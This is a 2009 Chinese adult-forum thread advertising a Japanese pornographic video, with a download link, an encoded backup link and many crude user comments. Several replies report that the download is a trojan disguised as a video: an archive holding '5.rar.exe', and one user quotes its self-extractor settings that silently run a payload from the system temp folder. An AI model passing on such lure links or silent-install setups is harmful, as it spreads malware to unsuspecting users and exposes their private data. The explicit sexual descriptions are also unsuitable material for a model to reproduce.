标题: [日本AV] [薄码/176*144]1男3女~新婚生活~母乳喂养~不看后悔[3gp/156.0 MB] [打印本页]

作者: wwq159    时间: 2009-6-18 12:07     标题: [薄码/176*144]1男3女~新婚生活~母乳喂养~不看后悔[3gp/156.0 MB]

【视频名称】:1男3女~新婚生活~母乳喂养

【视频大小】:156.0 MB

【视频格式】:3GP

【视频规格】:176*144

【有码无码】:薄码

【视频预览】:

上边的图片基本把整部影片都给概括了,看在我这么辛苦截图的份上,大家给点红心吧!
压制不易,如果喜欢,请您点击

[下载地址]:http://www.rayfile.com/zh-cn/fil ... -b405-0014221b798a/

防屏蔽:
复制内容到剪贴板
代码:
fs2you://Y2FjaGVmaWxlMTgucmF5ZmlsZS5jb20vemgtY24vZG93bmxvYWQvMjI1OTdiOTI5NTgwN2E2ZGQyZjBhMzQ0MDBjMjVjYmYvNS5yYXJ8MTYzNjIzNjY0

作者: chenkehao    时间: 2009-6-18 15:41

这小伙子真的很有福气呀,三个美女伺候!吃的还真是很有营养呀,感谢楼主发片!
作者: qhywhtxmxp1984    时间: 2009-6-18 19:50

很少见的母乳片,可惜了了,女优,男优形象不佳
作者: zdwasd    时间: 2009-6-18 21:00

欧巴桑那个对不起观众也就算了怄气桑也对不起观众,看的老夫想喷一下,难道日本鬼子江郎才尽了么?净高这调调
作者: dengzk    时间: 2009-6-18 21:37

好像已经被屏蔽了啊 被举报 ?下不到啊 楼主检查一下吧
作者: soul613    时间: 2009-6-18 21:45

冲着打咪咪也要下!看楼主的预览里头好像都是大咪咪的妹妹啊!
作者: qxg004    时间: 2009-6-18 22:11

用不用这么幸福啊?真渴望这种封建社会制度下的生活,可以有好几个老婆,老婆不老实还可以修掉,哪像现在啊?
作者: n5105    时间: 2009-6-18 22:14

贱人,有毒的,“.exe”结尾的文件,可恶~~~~~~~~~~~~~
作者: n5105    时间: 2009-6-18 22:25

下载了把扩展名改成.rar就可以解压了,不要上当
作者: 6217904    时间: 2009-6-19 10:56

这样,也行。果然是日本人,几个老婆的日子真好
作者: lilipower    时间: 2009-6-19 12:29

这男人太猥琐了,真是浪费这三个美艳乳娘了!
作者: 4234039    时间: 2009-6-20 08:23

好幸福的家庭生活 这个男主角要被奶水淹死了
作者: 男孩儿    时间: 2009-6-20 11:22

看着就激情了,下来看下肯定不错。我喜欢这类型的。
作者: bbhhgg    时间: 2009-6-20 12:17

看画面好像不是很清晰啊,这个有清晰版的吗?希望能下个清晰版的。或者这个全名叫什么呀?
作者: 色小人    时间: 2009-6-21 01:18

很少见的母乳片 有点恶心 不喜欢 不支持
作者: baidubaitu    时间: 2009-6-21 07:47

看上去很不错,这样题材的片子太少了,很刺激,主人公很幸福啊
作者: deco1989    时间: 2009-6-21 08:26

女优的身材超好的,这种片子最吸引人了,只能意淫了
作者: efrog    时间: 2009-7-3 18:32

楼主的截图这么多,已经看得非常爽了,不下不行!
作者: 3657785    时间: 2009-7-3 18:39

好与不好要看了才知道   下了回去慢慢看
作者: molutu    时间: 2009-7-4 00:00

看到这部AV让我想起了幼儿时期这男的真幸福
作者: by904    时间: 2009-7-4 01:27

令男人感到性福的女主角,竟然配着令女人看到性冷淡的男主角.
作者: fanmaoming    时间: 2009-7-13 16:42

这个片子原来看过了,题材是好呀,可惜就是母乳的女优不好找。
这3个不行。纯支持楼主了。
作者: hzwry    时间: 2009-7-13 16:57

感谢LZ
红星支持
随便说下那男的长的也太委琐了点啊
作者: binghezi    时间: 2009-7-13 17:07

人妻最爱.我最喜欢就是人妻 还有母乳 红心送上 支持LZ发贴
作者: yanli79    时间: 2009-7-13 19:49

真的是太丑了,楼主发的什么东西,呕吐啊。小日本没人了吗
作者: hehaolun    时间: 2009-7-13 21:57

最佩服日本人在拍a片时的创意,少妇的奶水真是有吸引力。
作者: fjfj999    时间: 2009-7-13 23:47

这片子不错啊,很喜欢熟女喂奶的类型,看图就很冲动了,下来看看先,谢谢楼主分享!
作者: erostar    时间: 2009-7-14 00:02

三个女的都不错,就是这个男的,长得有点太抽象了
作者: hvampire    时间: 2009-7-17 23:34     标题: 大家注意,下载的文件有毒!请勿下载

下载后文件为5.rar
解压后有文件5.rar.exe 再解压缩后会自动运行以下脚本

Path=%systemroot%\temp
SavePath
Setup=运行.exe
Silent=1            
Overwrite=1

其中运行.exe就是楼主放的木马或者其他什么东东 估计是拷贝木马服务端到操作系统根目录下的temp文件夹 而且执行此脚本是静默状态(Silent = 1)。
请版主处理呀,已经下载并运行的同志们赶紧杀毒吧,小心你们的隐私资料等泄露哟....

作者: huanghz01    时间: 2009-7-31 21:18

楼主啊,你的这个地址已经过期了啊,再高一个吧。
作者: like999    时间: 2009-7-31 21:28

点了连接没用啊,防屏蔽的地址也不行,怎么会事?
作者: jinhuiwe    时间: 2009-9-10 18:03

怎么是有码的啊,我喜欢无码的,谢谢了楼主发片
作者: korpela    时间: 2009-9-13 16:38

很想下了,可惜下不了了。很无奈,也很可惜。我很喜欢这样的片子。
作者: xiefeioo1    时间: 2009-9-13 16:46

听名字就很精彩 此类型的题材不是很多 大家一起来下吧
作者: rioufreedom    时间: 2009-10-2 14:48

这小伙子真的很有福气呀,三个美女伺候!吃的还真是很有营养呀,感谢楼主发片!
作者: ws19820119    时间: 2009-10-2 14:52

啊,日本男人的婚后生活真是幸福,老婆母乳喂养老公啊,真幸福!羡慕啊
作者: yyjj623    时间: 2009-10-2 15:40

好疯狂!母乳好有营养的,那男的赚到了!不过应该不是真的啦,拍戏而已!
作者: hrd11qq11    时间: 2009-10-2 16:53

看着够爽了,不过其实奶水一点也不好喝,咱也是喝过的人
作者: yj2002114    时间: 2009-10-2 17:21

这男人真是幸福,这么搞一次死了也值了!爽啊!

欢迎光临 SiS001! Board - [第一会所 关闭注册] (http://154.84.5.211/bbs/) Powered by Discuz! 7.2